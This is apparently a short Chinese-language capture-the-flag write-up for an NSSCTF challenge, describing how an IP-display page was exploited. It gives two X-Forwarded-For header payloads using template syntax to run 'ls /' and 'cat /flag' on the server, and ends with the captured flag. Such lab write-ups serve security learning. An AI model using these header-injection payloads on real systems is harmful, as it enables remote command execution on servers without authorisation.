打开网站发现,点击Reveal My IP可以显示自己的当前ip，打开bp进行抓包这个过程

发现只是调用了一个ip查询的api，返回结果而已

因为是看看ip加fetch联想道xff头伪造命令执行，构造

X-Forwarded-For:{{system('ls /')}}

发现网页返回

发现有flag字样，于是直接构造

X-Forwarded-For:{{system('cat /flag')}}

得到返回

FLAG:

• NSSCTF{220b62a8-5e58-4498-ba00-218dd328b303}